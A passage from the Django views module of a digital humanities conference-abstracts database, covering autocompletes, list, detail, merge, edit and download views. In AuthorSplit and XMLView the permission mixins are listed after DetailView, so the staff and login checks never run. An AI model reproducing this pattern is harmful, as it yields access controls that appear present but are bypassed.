import models from .models import ( Work, WorkType, Author, Conference, Institution, Appellation, Affiliation, ConferenceSeries, SeriesMembership, Organizer, Country, Keyword, Topic, Language, CountryLabel, Authorship, License, ) from .forms import ( WorkFilter, AuthorFilter, AuthorMergeForm, WorkForm, WorkAuthorshipForm, FullInstitutionForm, InstitutionMergeForm, AffiliationEditForm, AffiliationMergeForm, KeywordMergeForm, TagForm, TopicMergeForm, AffiliationMultiMergeForm, KeywordMultiMergeForm, ConferenceForm, ConferenceCheckoutForm, ConferenceSeriesInline, LanguageMergeForm, WorkTypeMergeForm, InstitutionMultiMergeForm, TopicMultiMergeForm, ConferenceXMLUploadForm, ) PERMISSIONS_ERROR_TEXT = ( "Please contact the lead project editors to edit this part of the database." ) def cache_for_anon(func): def wrap(request, *args, **kwargs): if request.user.is_authenticated: return func(request, *args, **kwargs) else: return cache_page(settings.CACHES["default"]["TIMEOUT"])(func)( request, *args, **kwargs ) return wrap def user_is_staff(func): def wrap(request, *args, **kwargs): if not request.user.is_authenticated: return redirect(f"{reverse('login')}?next={request.path}") if request.user.is_staff: return func(request, *args, **kwargs) else: messages.warning(request, PERMISSIONS_ERROR_TEXT) return redirect("home_view") return wrap class StaffRequiredMixin: def dispatch(self, *args, **kwargs): if not self.request.user.is_authenticated: return redirect(f"{reverse('login')}?next={self.request.path}") if self.request.user.is_staff: return super().dispatch(*args, **kwargs) else: messages.warning(self.request, PERMISSIONS_ERROR_TEXT) return redirect("home_view") class ItemLabelAutocomplete(Select2QuerySetView): def get_selected_result_label(self, item): return self.get_result_label(item) class WorkAutocomplete(ItemLabelAutocomplete): raise_exception = True def get_queryset(self): qs = Work.objects.all() parents_only = self.forwarded.get("parents_only", None) if parents_only: 
qs = qs.filter(work_type__is_parent=True) conference = self.forwarded.get("conference", None) if conference: qs = qs.filter(conference=conference) if self.q: qs = qs.filter(title__icontains=self.q) return qs.all() class AppellationAutocomplete(ItemLabelAutocomplete): raise_exception = True def get_queryset(self): qs = Appellation.objects.all() if self.q: qs = qs.filter( Q(first_name__icontains=self.q) | Q(last_name__icontains=self.q) ).all() return qs class KeywordAutocomplete(ItemLabelAutocomplete): raise_exception = True def get_queryset(self): qs = Keyword.objects.annotate(n_works=Count("works")).order_by("-n_works") if self.q: qs = qs.filter(title__icontains=self.q).all() return qs def get_result_label(self, item): return f"{item} ({item.n_works} works)" class LanguageAutocomplete(ItemLabelAutocomplete): raise_exception = True def get_queryset(self): qs = Language.objects.annotate(n_works=Count("works")).order_by( "-n_works", "title" ) if self.q: qs = qs.filter(title__icontains=self.q).all() return qs def get_result_label(self, item): return f"{item} ({item.n_works} works)" class TopicAutocomplete(ItemLabelAutocomplete): raise_exception = True def get_queryset(self): qs = Topic.objects.annotate(n_works=Count("works")).order_by("-n_works") if self.q: qs = qs.filter(title__icontains=self.q).all() return qs def get_result_label(self, item): return f"{item} ({item.n_works} works)" class CountryAutocomplete(ItemLabelAutocomplete): raise_exception = True def get_queryset(self): qs = Country.objects.annotate( n_works=Count( "institutions__affiliations__asserted_by__work", distinct=True ) ).order_by("-n_works") if self.q: qs = qs.filter( Q(pref_name__icontains=self.q) | Q(names__name__icontains=self.q) ) return qs.distinct() def get_result_label(self, item): return f"{item} ({item.n_works} works)" class InstitutionAutocomplete(ItemLabelAutocomplete): raise_exception = True def get_queryset(self): qs = ( Institution.objects.annotate( 
n_works=Count("affiliations__asserted_by__work", distinct=True) ) .select_related("country") .order_by("-n_works") ) if self.q: qs = qs.filter(name__icontains=self.q).all() return qs def get_result_label(self, item): if item.country is not None: c_label = item.country.pref_name else: c_label = "" location_statement = ", ".join( [l for l in [item.state_province_region, c_label] if l != ""] ) return f"{item} ({item.n_works} works)<br><small text-class='muted'>{location_statement}</small>" class AffiliationAutocomplete(ItemLabelAutocomplete): raise_exception = True def get_queryset(self): qs = ( Affiliation.objects.annotate( n_works=Count("asserted_by__work", distinct=True) ) .select_related("institution", "institution__country") .order_by("-n_works") ) inst_filter = self.forwarded.get("institution", None) if inst_filter: qs = qs.filter(institution=inst_filter) if self.q: qs = qs.filter( Q(department__icontains=self.q) | Q(institution__name__icontains=self.q) ).distinct() return qs def get_result_label(self, item): if item.institution.country is not None: c_label = item.institution.country.pref_name else: c_label = "" location_statement = ", ".join( [l for l in [item.institution.state_province_region, c_label] if l != ""] ) return f"{item} ({item.n_works} works)<br><small text-class='muted'>{location_statement}</small>" class ConferenceAutocomplete(ItemLabelAutocomplete): raise_exception = True def get_queryset(self): qs = Conference.objects.annotate( main_series=StringAgg( "series_memberships__series__abbreviation", delimiter=" / ", distinct=True, ) ).order_by("year", "main_series", "short_title", "theme_title") if self.q: qs = qs.filter(search_text__icontains=self.q).distinct() return qs def get_result_label(self, item): if item.main_series: return f"{item.main_series} - {item.year} - {item.short_title}" elif item.short_title: return f"{item.year} - {item.short_title}" else: return f"{item.year} - {item.theme_title}" class AuthorAutocomplete(ItemLabelAutocomplete): 
raise_exception = True def get_queryset(self): qs = Author.objects.annotate( n_works=Count("authorships", distinct=True), main_last_name=Max("appellations__last_name"), main_first_name=Max("appellations__first_name"), ).order_by("main_last_name", "main_first_name", "-n_works") if self.q: qs = qs.filter(appellations_index__icontains=self.q).distinct() return qs def get_result_label(self, item): return format_html( f"{item.most_recent_appellation} ({item.n_works} works)<br><small text-class='muted'>(All names: {item.appellations_index})</small>" ) def work_view(request, work_id): related_conference = Conference.objects.annotate( n_works=Count("works", distinct=True), n_authors=Count("works__authors", distinct=True), main_series=StringAgg( "series_memberships__series__abbreviation", delimiter=" / ", distinct=True ), ).prefetch_related("series", "organizers") work = get_object_or_404( Work.objects.select_related("work_type", "full_text_license").prefetch_related( Prefetch("conference", queryset=related_conference), "keywords", "topics", "languages", Prefetch( "session_papers", queryset=Work.objects.prefetch_related( Prefetch( "authorships", queryset=Authorship.objects.select_related("appellation"), ), ), ), Prefetch( "parent_session", queryset=Work.objects.prefetch_related( Prefetch( "authorships", queryset=Authorship.objects.select_related( "author", "appellation" ), ) ), ), ), pk=work_id, ) authorships = ( Authorship.objects.filter(work_id=work_id) .order_by("authorship_order") .distinct() .select_related("work", "author", "appellation") .prefetch_related( Prefetch( "affiliations", queryset=Affiliation.objects.select_related( "institution", "institution__country" ), ) ) ) context = {"work": work, "authorships": authorships} return render(request, "work_detail.html", context) def author_view(request, author_id): author = get_object_or_404(Author, pk=author_id) sorted_authorships = ( Authorship.objects.filter(author=author) .order_by("work__conference__year") 
.prefetch_related( Prefetch("work", queryset=Work.objects.select_related("conference")) ) ) appellations = ( Appellation.objects.filter(asserted_by__author=author) .distinct() .annotate(latest_year=Max("asserted_by__work__conference__year")) .order_by("-latest_year") .prefetch_related(Prefetch("asserted_by", queryset=sorted_authorships)) ) affiliations = ( Affiliation.objects.filter(asserted_by__author=author) .distinct() .annotate(latest_year=Max("asserted_by__work__conference__year")) .order_by("-latest_year") .prefetch_related( Prefetch("asserted_by", queryset=sorted_authorships), Prefetch( "institution", queryset=Institution.objects.select_related("country") ), ) ) works = ( Work.objects.filter(authorships__author=author) .order_by("conference__year") .distinct() .select_related("conference", "parent_session", "work_type") .prefetch_related( Prefetch( "conference", queryset=Conference.objects.prefetch_related("series", "organizers"), ), "session_papers", "keywords", "topics", "languages", Prefetch( "authorships", queryset=Authorship.objects.select_related("appellation", "author"), ), ) ) author_admin_page = reverse("admin:abstracts_author_change", args=(author.pk,)) context = { "author": author, "works": works, "appellations": appellations, "affiliations": affiliations, "author_admin_page": author_admin_page, } return render(request, "author_detail.html", context) class AuthorSplit(DetailView, StaffRequiredMixin): model = Author template_name = "author_split.html" context_object_name = "original_author" def get_context_data(self, **kwargs): authorships = Authorship.objects.filter(author=self.get_object()).order_by( "work__conference__year" ) return {self.context_object_name: self.get_object(), "authorships": authorships} @transaction.atomic def post(self, request, *args, **kwargs): authorships_to_move = request.POST.getlist("splitselect") try: new_author = Author.objects.create() Authorship.objects.filter(id__in=authorships_to_move).update( author=new_author ) 
self.get_object().save() new_author.save() messages.success( request, f"{len(authorships_to_move)} authorships moved to new author id {new_author.id}", ) return redirect("author_detail", new_author.id) except: messages.error(request, str(authorships_to_move)) return redirect("author_split", self.get_object().id) class XMLView(DetailView, LoginRequiredMixin): model = Work context_object_name = "work" def get(self, request, *args, **kwargs): response = HttpResponse(self.get_object().full_text, content_type="xhtml+xml") response[ "Content-Disposition" ] = f"attachment; filename={self.get_object().id}.xml" return response class AuthorList(ListView): context_object_name = "author_list" template_name = "author_list.html" paginate_by = 50 def get_queryset(self): base_result_set = Author.objects.exclude(appellations__isnull=True).annotate( n_conferences=Count("works__conference", distinct=True) ) raw_filter_form = AuthorFilter(self.request.GET) if raw_filter_form.is_valid(): filter_form = raw_filter_form.cleaned_data order_res = filter_form["ordering"] if order_res is None or order_res == "": order_res = "last_name" result_set = base_result_set.annotate( last_name=Max("appellations__last_name"), n_works=Count("authorships", distinct=True), ).order_by(order_res) author_res = filter_form["author"] if author_res is not None: result_set = result_set.filter(id=author_res.id) affiliation_res = filter_form["affiliation"] if affiliation_res is not None: result_set = result_set.filter( authorships__affiliations=affiliation_res ) institution_res = filter_form["institution"] if institution_res is not None: result_set = result_set.filter( authorships__affiliations__institution=institution_res ) country_res = filter_form["country"] if country_res is not None: result_set = result_set.filter( authorships__affiliations__institution__country=country_res ) conference_res = filter_form["conference"] if conference_res is not None: result_set = 
result_set.filter(works__conference=conference_res) if filter_form["singleton"]: result_set = result_set.filter(n_conferences=1) name_res = filter_form["name"] if name_res != "": result_set = result_set.filter(appellations_index__icontains=name_res) first_name_res = filter_form["first_name"] if first_name_res != "": result_set = result_set.filter( authorships__appellation__first_name__icontains=first_name_res ) last_name_res = filter_form["last_name"] if last_name_res != "": result_set = result_set.filter( authorships__appellation__last_name__icontains=last_name_res ) newest_authorship = Authorship.objects.filter( author=OuterRef("pk") ).order_by("-work__conference__year") annotated_authors = result_set.annotate( main_affiliation_department=Subquery( newest_authorship.values("affiliations__department")[:1] ), main_affiliation_institution=Subquery( newest_authorship.values("affiliations__institution__name")[:1] ), main_affiliation_institution_city=Subquery( newest_authorship.values("affiliations__institution__city")[:1] ), main_affiliation_institution_state=Subquery( newest_authorship.values( "affiliations__institution__state_province_region" )[:1] ), main_affiliation_institution_country=Subquery( newest_authorship.values( "affiliations__institution__country__pref_name" )[:1] ), most_recent_first_name=Subquery( newest_authorship.values("appellation__first_name")[:1] ), most_recent_last_name=Subquery( newest_authorship.values("appellation__last_name")[:1] ), n_works=Count("authorships", distinct=True), ) return annotated_authors else: messages.warning( self.request, "Query parameters not recognized. 
Check your URL and try again.", ) return base_result_set def get_context_data(self, **kwargs): context = super().get_context_data(**kwargs) context["author_filter_form"] = AuthorFilter(data=self.request.GET) context["available_authors_count"] = Author.objects.count() context["redirect_url"] = reverse("author_list") return context def annotate_multiple_series(qs): return qs.annotate( n_conferences=Count("conferences", distinct=True), earliest_year=Min("conferences__year"), latest_year=Max("conferences__year"), n_complete=Count( "conferences", filter=Q(conferences__entry_status="c"), distinct=True ), n_in_progress=Count( "conferences", filter=Q(conferences__entry_status="i"), distinct=True ), n_in_review=Count( "conferences", filter=Q(conferences__entry_status="r"), distinct=True ), n_remaining=F("n_conferences") - F("n_complete") - F("n_in_progress") - F("n_in_review"), pct_complete=( Cast(F("n_complete"), FloatField()) / Cast(F("n_conferences"), FloatField()) ) * 100, pct_in_progress=( Cast(F("n_in_progress"), FloatField()) / Cast(F("n_conferences"), FloatField()) ) * 100, pct_in_review=( Cast(F("n_in_review"), FloatField()) / Cast(F("n_conferences"), FloatField()) ) * 100, pct_remaining=( Cast(F("n_remaining"), FloatField()) / Cast(F("n_conferences"), FloatField()) ) * 100, ).order_by("title") def annotate_single_series(qs): res = qs.aggregate( earliest_year=Min("year"), latest_year=Max("year"), n_conferences=Count("id", distinct=True), n_complete=Count("id", filter=Q(entry_status="c"), distinct=True), n_in_progress=Count("id", filter=Q(entry_status="i"), distinct=True), n_in_review=Count("id", filter=Q(entry_status="r"), distinct=True), ) res["n_remaining"] = ( res["n_conferences"] - res["n_complete"] - res["n_in_progress"] - res["n_in_review"] ) if res["n_conferences"] > 0: res["pct_complete"] = (res["n_complete"] / res["n_conferences"]) * 100 res["pct_in_progress"] = (res["n_in_progress"] / res["n_conferences"]) * 100 res["pct_in_review"] = (res["n_in_review"] 
/ res["n_conferences"]) * 100 res["pct_remaining"] = (res["n_remaining"] / res["n_conferences"]) * 100 else: res["pct_complete"] = 0 res["pct_in_progress"] = 0 res["pct_in_review"] = 0 res["pct_remaining"] = 0 return res def conference_series_qs(): return annotate_multiple_series( ConferenceSeries.objects.exclude(conferences__isnull=True) ) class ConferenceSeriesList(ListView): context_object_name = "series_list" template_name = "conference_series_list.html" def get_queryset(self): base_result_set = conference_series_qs() return base_result_set def get_context_data(self, **kwargs): context = super().get_context_data(**kwargs) sa_conf = Conference.objects.filter(series__isnull=True) context["standalone_conferences"] = annotate_single_series(sa_conf) context["standalone_conference_count"] = sa_conf.count() return context class ConferenceSeriesDetail(DetailView): model = ConferenceSeries template_name = "conference_series_detail.html" context_object_name = "series" def get_member_conferences(self): return Conference.objects.filter(series_memberships__series=self.get_object()) def get_context_data(self, **kwargs): context = super().get_context_data(**kwargs) context["series_progress"] = annotate_single_series( self.get_member_conferences() ) series_order_subquery = SeriesMembership.objects.filter( conference=OuterRef("pk"), series=self.get_object() ).order_by("number") context["conference_list"] = ( self.get_member_conferences() .annotate( main_series=StringAgg( "series_memberships__series__abbreviation", delimiter=" / ", distinct=True, ), n_works=Count("works", distinct=True), n_authors=Count("works__authors", distinct=True), series_order=Subquery(series_order_subquery.values("number")[:1]), ) .order_by("series_order") .prefetch_related( "series_memberships", "series_memberships__series", "organizers", "country", "hosting_institutions", "hosting_institutions__country", "documents", ) ) context["series_list"] = conference_series_qs() return context class 
StandaloneList(View): template_name = "conference_series_detail.html" def get_standalone_list(self): qs = ( Conference.objects.filter(series__isnull=True) .annotate( main_series=StringAgg( "series_memberships__series__abbreviation", delimiter=" / ", distinct=True, ), n_works=Count("works", distinct=True), n_authors=Count("works__authors", distinct=True), ) .order_by("year", "short_title", "theme_title") .prefetch_related( "series_memberships", "series_memberships__series", "organizers", "country", "hosting_institutions", "hosting_institutions__country", "documents", ) ) return qs def get(self, request): faux_series = { "title": "Standalone Events", "notes": "Digital humanities events not belonging to a larger series, such symposia or workshops.", "n_conferences": self.get_standalone_list().count(), } context = { "conference_list": self.get_standalone_list(), "series": faux_series, "series_list": conference_series_qs(), "series_progress": annotate_single_series(self.get_standalone_list()), } return render(request, self.template_name, context) def home_view(request): conference_count = Conference.objects.count() years_count = Conference.objects.aggregate(year_range=Max("year") - Min("year"))[ "year_range" ] work_count = Work.objects.count() author_count = Author.objects.exclude(authorships__work__isnull=True).count() institution_count = Institution.objects.count() country_count = ( Country.objects.filter( Q(institutions__affiliations__asserted_by__work__isnull=False) | Q(institutions__conferences__isnull=False) | Q(conferences__isnull=False) ) .distinct() .count() ) context = { "site": { "conference_count": conference_count, "years_count": years_count, "work_count": work_count, "author_count": author_count, "institution_count": institution_count, "country_count": country_count, } } return render(request, "index.html", context) @user_is_staff @transaction.atomic def author_merge_view(request, author_id): author = get_object_or_404(Author, pk=author_id) if 
request.method == "GET": context = {"merging": author, "author_merge_form": AuthorMergeForm} return render(request, "author_merge.html", context) elif request.method == "POST": """ Posting the new author id causes all of the old author's authorships to be reassigned. """ raw_form = AuthorMergeForm(request.POST) if raw_form.is_valid(): target_author = raw_form.cleaned_data["into"] if author == target_author: """ If the user chooses the existing author, don't merge, but instead error out. """ messages.error( request, f"You cannot merge an author into themselves. Please select a different author.", ) return redirect("author_merge", author_id=author_id) else: old_author_string = str(author) merge_results = author.merge(target_author) target_author.user_last_updated = request.user target_author.save() messages.success( request, f"Author {old_author_string} has been merged into {target_author}, and the old author entry has been deleted.", ) messages.success( request, f"{merge_results['update_results']} authorships updated" ) return redirect("author_detail", author_id=target_author.pk) else: for error in raw_form.errors: messages.error(request, error) return render(request, "author_merge.html", context) def field_required(field): if field.get_internal_type() in ("CharField", "TextField") and field.blank: return False if field.null: return False return True def download_data(request): data_dictionary = [] if request.user.is_authenticated: dt_config = settings.PRIVATE_DATA_TABLE_CONFIG zip_url = reverse("private_all_tables_download") else: dt_config = settings.PUBLIC_DATA_TABLE_CONFIG zip_url = reverse("public_all_tables_download") denormalized_url = reverse("works_download") denormalized_last_updated = datetime.fromtimestamp( getmtime(f"{settings.DATA_OUTPUT_PATH}/{settings.DENORMALIZED_WORKS_NAME}.zip") ) for m in dt_config["CONFIGURATION"]: model = attrgetter(m["model"])(models) if "manual_model_description" in m: model_description = m["manual_model_description"] else: 
try: model_description = model.model_description except: model_description = None all_model_fields = [ { "name": f.name, "relation": f.is_relation, "help_text": f.help_text, "related_model": str(f.related_model) .replace("<class 'abstracts.models.", "") .replace("'>", ""), "type": f.get_internal_type(), "required": field_required(f), } for f in model._meta.fields if not f.one_to_many and f.name not in m["exclude_fields"] ] if m.get("include_string", False): all_model_fields.append( { "name": "label", "relation": None, "help_text": "General label for this object", "related_model": None, "type": "CharField", "required": True, } ) data_dictionary.append( { "model": m["model"], "model_description": model_description, "csv_name": m["csv_name"], "fields": all_model_fields, } ) normalized_last_updated = datetime.fromtimestamp( getmtime(f"{settings.DATA_OUTPUT_PATH}/{dt_config['DATA_ZIP_NAME']}") ) context = { "zip_url": zip_url, "denormalized_url": denormalized_url, "denormalized_last_updated": denormalized_last_updated, "normalized_last_updated": normalized_last_updated, "data_dictionary": data_dictionary, "denormalized_data_dictionary": settings.DENORMALIZED_HEADERS, } return render(request, "downloads.html", context) def download_works_csv(request): target_zip = f"{settings.DATA_OUTPUT_PATH}/{settings.DENORMALIZED_WORKS_NAME}.zip" response = FileResponse(open(target_zip, "rb")) return response def public_download_all_tables(request): target_zip = f"{settings.DATA_OUTPUT_PATH}/{settings.PUBLIC_DATA_TABLE_CONFIG['DATA_ZIP_NAME']}" response = FileResponse(open(target_zip, "rb")) return response @login_required def private_download_all_tables(request): target_zip = f"{settings.DATA_OUTPUT_PATH}/{settings.PRIVATE_DATA_TABLE_CONFIG['DATA_ZIP_NAME']}" response = FileResponse(open(target_zip, "rb")) return response @login_required def WorkCreate(request): if request.method == "GET": if "conference" in request.GET: conf = get_object_or_404(Conference, 
pk=int(request.GET["conference"])) work_form = WorkForm(initial={"conference": conf.pk}) else: work_form = WorkForm() if request.method == "POST": work_form = WorkForm(request.POST) if work_form.is_valid(): new_work = work_form.save() new_work.user_last_updated = request.user new_work.save() messages.success(request, f"{new_work} created.") return redirect("work_edit_authorship", work_id=new_work.pk) else: for err in work_form.errors: messages.error(request, err) context = {"work_form": work_form} return render(request, "work_create.html", context) @login_required def WorkEdit(request, work_id): work = get_object_or_404(Work, pk=work_id) if request.method == "POST": work_form = WorkForm(request.POST, instance=work) if work_form.is_valid(): work.user_last_updated = request.user work_form.save() messages.success(request, f'"{work.title}" sucessfully updated.') return redirect("work_detail", work_id=work.pk) else: for f, e in work_form.errors.items(): messages.error(request, f"{f}: {e}") work_initial_data = model_to_dict(work) context = {"work_form": WorkForm(initial=work_initial_data), "work": work} return render(request, "work_edit.html", context) @login_required @transaction.atomic def WorkEditAuthorship(request, work_id): work = get_object_or_404(Work, pk=work_id) authorships = work.authorships.all() AuthorshipWorkFormset = formset_factory( WorkAuthorshipForm, can_delete=True, extra=0 ) initial_data = [] for authorship in authorships: base_data = { "author": authorship.author, "authorship_order": authorship.authorship_order, "first_name": authorship.appellation.first_name, "last_name": authorship.appellation.last_name, "affiliations": [aff for aff in authorship.affiliations.all()], } initial_data.append(base_data) if request.method == "GET": authorships_forms = AuthorshipWorkFormset(initial=initial_data) elif request.method == "POST": authorships_forms = AuthorshipWorkFormset(request.POST) if authorships_forms.is_valid(): for d_form in 
authorships_forms.deleted_forms: d_form_data = d_form.cleaned_data attached_author = d_form_data["author"] Authorship.objects.filter( work=work, author=d_form_data["author"] ).delete() attached_author.save() for aform in authorships_forms: if aform not in authorships_forms.deleted_forms: aform_data = aform.cleaned_data appellation = Appellation.objects.get_or_create( first_name=aform_data["first_name"], last_name=aform_data["last_name"], )[0] affiliations = aform_data["affiliations"] authorship_order = aform_data["authorship_order"] try: if aform_data["author"] is None: author_id = Author.objects.create() else: author_id = aform_data["author"] auth = Authorship.objects.update_or_create( work=work, author=author_id, defaults={ "authorship_order": authorship_order, "appellation": appellation, "user_last_updated": request.user, }, )[0] author_id.user_last_updated = request.user author_id.save() except IntegrityError as e: messages.error( request, f"{e}: Ensure authorship order numbers are unique" ) return redirect("work_edit_authorship", work.pk) auth.affiliations.clear() if affiliations is not None: auth.affiliations.set(affiliations) messages.success( request, f'"{work.title}" authorships successfully updated.' 
) if "start_new" in request.POST: return redirect( f"{reverse('work_create')}?conference={work.conference.pk}" ) return redirect("work_detail", work_id=work.pk) else: for error in authorships_forms.errors: messages.error(request, error) context = { "authorships_form": authorships_forms, "work": work, "affiliation_form": AffiliationEditForm, } return render(request, "work_edit_authorships.html", context) @login_required def AuthorInfoJSON(request, author_id): if request.method == "GET": author = get_object_or_404(Author, pk=author_id) author_aff = Affiliation.objects.filter(asserted_by__author=author).distinct() author_dict = { "first_name": author.most_recent_appellation.first_name, "last_name": author.most_recent_appellation.last_name, "work_titles": [w.title for w in author.works.all()][:4], "works_count": author.works.count(), } if author_aff is not None: author_dict["affiliations"] = [ {"name": str(aff), "id": aff.pk} for aff in author_aff ] return JsonResponse(author_dict) @login_required def AffiliationInfoJSON(request, affiliation_id): if request.method == "GET": affiliation = get_object_or_404(Affiliation, pk=affiliation_id) affiliation_dict = { "institution": { "name": str(affiliation.institution), "id": affiliation.institution.id, } } if affiliation.department is not None: affiliation_dict["department"] = affiliation.department return JsonResponse(affiliation_dict) class WorkDelete(LoginRequiredMixin, SuccessMessageMixin, DeleteView): model = Work template_name = "work_delete.html" extra_context = {"cancel_view": "work_list"} success_url = reverse_lazy("work_list") def delete(self, request, *args, **kwargs): messages.success(self.request, f"'{self.get_object().title}' deleted") return super().delete(request, *args, **kwargs) class FullWorkList(ListView): context_object_name = "work_list" template_name = "work_list.html" paginate_by = 10 def get_queryset(self): base_result_set = Work.objects.all() raw_filter_form = WorkFilter(self.request.GET) if 
raw_filter_form.is_valid(): result_set = base_result_set filter_form = raw_filter_form.cleaned_data work_type_res = filter_form["work_type"] if work_type_res is not None: result_set = result_set.filter(work_type=work_type_res) conference_res = filter_form["conference"] if conference_res is not None: result_set = result_set.filter(conference=conference_res) affiliation_res = filter_form["affiliation"] if len(affiliation_res) > 0: result_set = result_set.filter( authorships__affiliations__in=affiliation_res ).distinct() institution_res = filter_form["institution"] if len(institution_res) > 0: result_set = result_set.filter( authorships__affiliations__institution__in=institution_res ).distinct() author_res = filter_form["author"] if len(author_res) > 0: result_set = result_set.filter(authorships__author__in=author_res) keyword_res = filter_form["keywords"] if len(keyword_res) > 0: result_set = result_set.filter(keywords__in=keyword_res) topic_res = filter_form["topics"] if len(topic_res) > 0: result_set = result_set.filter(topics__in=topic_res) language_res = filter_form["languages"] if len(language_res) > 0: result_set = result_set.filter(languages__in=language_res) if filter_form["full_text_available"]: result_set = result_set.exclude(full_text="") if filter_form["full_text_viewable"]: result_set = result_set.exclude(full_text="").filter( full_text_license__isnull=False ) text_res = filter_form["text"] if text_res != "": text_query = SearchQuery(text_res, search_type="websearch") result_set = ( result_set.filter(search_text=text_query) .annotate( rank=SearchRank( F("search_text"), text_query, ), search_in_ft_only=ExpressionWrapper( ~Q(title__icontains=text_res), output_field=BooleanField() ), ) .filter(rank__gt=0.1) .order_by("-rank") ) order_res = "rank" first_author_subquery = Authorship.objects.filter( work=OuterRef("pk") ).order_by("authorship_order") order_res = filter_form["ordering"] if order_res is None or order_res == "": order_res = "year" if order_res == 
"year": result_set = result_set.order_by("conference__year", "title") elif order_res == "-year": result_set = result_set.order_by("-conference__year", "title") elif order_res == "title": result_set = result_set.order_by("title") elif order_res == "-title": result_set = result_set.order_by("-title") elif order_res == "last_name": result_set = result_set.annotate( first_author_last_name=Subquery( first_author_subquery.values("appellation__last_name")[:1] ) ).order_by("first_author_last_name", "title") elif order_res == "-last_name": result_set = result_set.annotate( first_author_last_name=Subquery( first_author_subquery.values("appellation__last_name")[:1] ) ).order_by("-first_author_last_name", "title") return ( result_set.select_related( "conference", "work_type", "parent_session", "full_text_license" ) .annotate( main_series=StringAgg( "conference__series_memberships__series__abbreviation", delimiter=" / ", distinct=True, ), main_institution=StringAgg( "conference__hosting_institutions__name", delimiter=" / ", distinct=True, ), ) .prefetch_related( Prefetch( "conference", queryset=Conference.objects.prefetch_related( Prefetch( "series_memberships", queryset=SeriesMembership.objects.select_related( "series" ), ), "organizers", ), ), "session_papers", Prefetch( "authorships", queryset=Authorship.objects.select_related( "appellation", "author" ), ), "keywords", "topics", "languages", ) ) else: for error in raw_filter_form.errors: messages.warning(self.request, error) return base_result_set def get_context_data(self, **kwargs): context = super().get_context_data(**kwargs) raw_filter_form = WorkFilter(self.request.GET) if raw_filter_form.is_valid(): filter_form = raw_filter_form.cleaned_data conference_res = filter_form["conference"] if conference_res is not None: conferences_data = ( Conference.objects.filter(id=conference_res.id) .annotate( n_works=Count("works", distinct=True), n_authors=Count("works__authors", distinct=True), main_series=StringAgg( 
"series_memberships__series__abbreviation", delimiter=" / ", distinct=True, ), ) .select_related("country") .prefetch_related( "organizers", "series_memberships", "series_memberships__series" ) .all() ) context["selected_conferences"] = conferences_data context["work_filter_form"] = WorkFilter(data=self.request.GET) context["available_works_count"] = Work.objects.count() context["filtered_works_count"] = self.get_queryset().count() context["redirect_url"] = reverse("work_list") return context class FullInstitutionList(LoginRequiredMixin, ListView): context_object_name = "institution_list" template_name = "full_institution_list.html" paginate_by = 10 def get_queryset(self): annotated_affiliations = Affiliation.objects.annotate( n_works=Count("asserted_by__work", distinct=True) ) result_set = ( Institution.objects.annotate( n_works=Count("affiliations__asserted_by__work", distinct=True) ) .prefetch_related( Prefetch("affiliations", annotated_affiliations), "country" ) .order_by("-n_works") ) if self.request.GET: raw_filter_form = FullInstitutionForm(self.request.GET) if raw_filter_form.is_valid(): filter_form = raw_filter_form.cleaned_data result_set = result_set.annotate( n_conferences=Count( "affiliations__asserted_by__work__conference", distinct=True ) ) department_res = filter_form["department"] if department_res != "": result_set = result_set.filter( affiliations__department__icontains=department_res ) affiliation_res = filter_form["affiliation"] if affiliation_res is not None: result_set = result_set.filter(affiliations=affiliation_res) institution_res = filter_form["institution"] if institution_res is not None: result_set = result_set.filter(pk=institution_res.pk) country_res = filter_form["country"] if country_res is not None: result_set = result_set.filter(country=country_res) if filter_form["no_department"]: result_set = result_set.filter(affiliations__department="") conference_res = filter_form["conference"] if conference_res is not None: result_set = 
result_set.filter( affiliations__asserted_by__work__conference=conference_res ).distinct() if filter_form["singleton"]: result_set = result_set.filter(n_conferences=1) if filter_form["ordering"] == "n_dsc": result_set = result_set.order_by( "-n_works", "affiliations__institution__name" ) elif filter_form["ordering"] == "n_asc": result_set = result_set.order_by( "n_works", "affiliations__institution__name" ) elif filter_form["ordering"] == "a": result_set = result_set.order_by("affiliations__institution__name") else: for f, e in raw_filter_form.errors.items(): messages.error(self.request, f"{f}: {e}") return result_set def get_context_data(self, **kwargs): context = super().get_context_data(**kwargs) context["institution_filter_form"] = FullInstitutionForm( initial=self.request.GET ) context["available_institutions_count"] = Institution.objects.count() context["filtered_institutions_count"] = self.get_queryset().count() context["redirect_url"] = reverse("full_institution_list") return context class AuthorInstitutionList(FullInstitutionList): template_name = "author_institution_list.html" def get_queryset(self): base_result_set = Institution.objects.annotate( n_authors=Count("affiliations__asserted_by__author", distinct=True), n_conferences=Count( "affiliations__asserted_by__work__conference", distinct=True ), ).distinct() result_set = base_result_set if self.request.GET: raw_filter_form = FullInstitutionForm(self.request.GET) if raw_filter_form.is_valid(): filter_form = raw_filter_form.cleaned_data department_res = filter_form["department"] if department_res != "": result_set = result_set.filter( affiliations__department__icontains=department_res ) affiliation_res = filter_form["affiliation"] if affiliation_res is not None: result_set = result_set.filter(affiliations=affiliation_res) institution_res = filter_form["institution"] if institution_res is not None: result_set = result_set.filter(pk=institution_res.pk) conference_res = filter_form["conference"] if 
conference_res is not None: result_set = result_set.filter(works__conference=conference_res) country_res = filter_form["country"] if country_res is not None: result_set = result_set.filter(country=country_res) if filter_form["singleton"]: result_set = result_set.filter(n_conferences=1) if filter_form["no_department"]: result_set = result_set.filter(affiliations__department="") if filter_form["ordering"] == "n_dsc": result_set = result_set.order_by("-n_authors") elif filter_form["ordering"] == "n_asc": result_set = result_set.order_by("n_authors") elif filter_form["ordering"] == "a": result_set = result_set.order_by("affiliations__institution__name") else: for f, e in raw_filter_form.errors.items(): messages.error(self.request, f"{f}: {e}") result_set = base_result_set else: result_set = result_set.order_by("-n_authors") return result_set.distinct() def get_context_data(self, **kwargs): context = super().get_context_data(**kwargs) context["redirect_url"] = reverse("author_institution_list") return context class InstitutionEdit(LoginRequiredMixin, SuccessMessageMixin, UpdateView): model = Institution template_name = "generic_form.html" fields = ["name", "city", "state_province_region", "country"] extra_context = { "form_title": "Edit institution", "cancel_view": "full_institution_list", "merge_view": "institution_merge", } success_message = "%(name)s updated" success_url = reverse_lazy("full_institution_list") def form_valid(self, form): response = super(InstitutionEdit, self).form_valid(form) self.object.user_last_updated = self.request.user self.object.save() return response class InstitutionCreate(LoginRequiredMixin, SuccessMessageMixin, CreateView): model = Institution template_name = "generic_form.html" fields = ["name", "city", "state_province_region", "country"] extra_context = { "form_title": "Create institution", "cancel_view": "full_institution_list", } success_message = "%(name)s created" success_url = reverse_lazy("full_institution_list") def 
